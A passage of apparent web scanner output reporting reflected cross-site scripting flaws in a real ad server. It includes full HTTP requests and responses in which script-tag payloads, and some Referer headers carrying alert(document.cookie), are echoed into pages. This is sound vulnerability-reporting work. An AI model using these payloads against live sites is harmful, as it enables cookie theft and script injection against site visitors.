Path:   /hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa6c"><script>alert(1)</script>4a6b454e377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373?bfa6c"><script>alert(1)</script>4a6b454e377=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.gamearena.com.au/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:54 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 473
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373?bfa6c"><script>alert(1)</script>4a6b454e377=1&relocate=http://clk.redcated/OMA/go/270181140/direct/01/"target="_blank">
...[SNIP]...

2.676. http://media.sensis.com.au/hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d7db"><script>alert(1)</script>2b3b5278dab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver6d7db"><script>alert(1)</script>2b3b5278dab/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:55 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 693
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a9600000000000000006d7db"><script>alert(1)</script>2b3b5278dab/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272/relocate=http://bs.serving-sys.
...[SNIP]...

2.677. http://media.sensis.com.au/hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3657d"><script>alert(1)</script>1faa0a4ddec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random3657d"><script>alert(1)</script>1faa0a4ddec=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:56 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 467
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random3657d"><script>alert(1)</script>1faa0a4ddec=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272/relocate=http://clk.redcated/OMA/go/27018
...[SNIP]...

2.678. http://media.sensis.com.au/hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d9a"><script>alert(1)</script>fb66149c7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272?69d9a"><script>alert(1)</script>fb66149c7fa=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondvideo.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:53 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 470
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272?69d9a"><script>alert(1)</script>fb66149c7fa=1&relocate=http://clk.redcated/OMA/go/270181140/direct/01/"target="_blank">
...[SNIP]...

2.679. http://media.sensis.com.au/hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888fe"><script>alert(1)</script>1510834deef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver888fe"><script>alert(1)</script>1510834deef/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:40 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc888fe"><script>alert(1)</script>1510834deef/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pag
...[SNIP]...

2.680. http://media.sensis.com.au/hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d98"><script>alert(1)</script>13a8b4f816b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random44d98"><script>alert(1)</script>13a8b4f816b=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 433
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random44d98"><script>alert(1)</script>13a8b4f816b=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=1229545
...[SNIP]...

2.681. http://media.sensis.com.au/hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e602f"><script>alert(1)</script>5b976c84b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e602f"><script>alert(1)</script>5b976c84b9=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:39 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 435
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=fffffffcfffffffcfffffffc/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e602f"><script>alert(1)</script>5b976c84b9=1" target="_new">
...[SNIP]...

2.682. http://media.sensis.com.au/hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6332b"><script>alert(1)</script>d1fc9b59ecc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver6332b"><script>alert(1)</script>d1fc9b59ecc/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:36 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e000000006332b"><script>alert(1)</script>d1fc9b59ecc/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

2.683. http://media.sensis.com.au/hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8938a"><script>alert(1)</script>6cf6331c17c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random8938a"><script>alert(1)</script>6cf6331c17c=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:37 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000/acc_random8938a"><script>alert(1)</script>6cf6331c17c=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746
...[SNIP]...

2.684. http://media.sensis.com.au/hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 640d5"><script>alert(1)</script>475c70acbff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?640d5"><script>alert(1)</script>475c70acbff=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:35 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 506
Pragma: no-cache
Cache-control: no-cache
